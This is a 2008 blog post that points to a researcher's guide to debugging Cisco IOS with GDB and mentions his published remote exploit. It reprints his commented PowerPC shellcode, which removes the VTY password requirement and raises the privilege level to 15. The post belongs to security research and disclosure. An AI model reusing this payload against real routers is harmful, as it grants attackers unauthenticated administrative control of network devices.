Step by Step Debugging Cisco IOS
aaron posted in Uncategorized on August 13th, 2008
This is kinda cool — I didn’t know that you could do this directly with GDB. Andy Davis has posted step by step instructions for debugging Cisco IOS with GDB. He’s done some other pretty interesting things lately including posting a remote exploit of IOS, and as a follow-up to the exploit he posted information on how his IOS shellcode works.
Other than a minor gdb patch, and a couple idiosyncrasies with the debugging process (you have to manually replace the instructions overwritten by breakpoint interrupts), from his instructions it looks like it’s pretty straightforward to do. I’m not sure of the details on how it’s able to attach to the kernel, but I’d like to try it out sometime. I wonder if some of this info will spur other security people to do more IOS research.
Andy’s IOS shellcode:
.equ vty_info, 0x8182da60    // contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis   4, vty_info@ha
la    4, vty_info@l(4)
xor   8,8,8              // Clear r8
lwzx  7,4,8              // Get pointer to VTY info structure
stw   8,372(7)           // Write zero to first offset to remove
                         // the requirement to enter a password
subi  8,8,1              // Set r8 to be 0xffffffff
addi  7,7,233            // Add second offset in two steps to
                         // avoid nulls in the shellcode
stw   8,1226(7)          // Write 0xffffffff to second offset to
                         // priv escalate to level 15
                         // (technically this should be 0xff100000
                         // but 0xffffffff works and is more efficient)
mr    3,8                // Use 0xffffffff as a parameter
                         // to pass to terminate()
lis   4, terminate@ha
la    4, terminate@l(4)
mtctr 4
bctr                     // terminate "this process"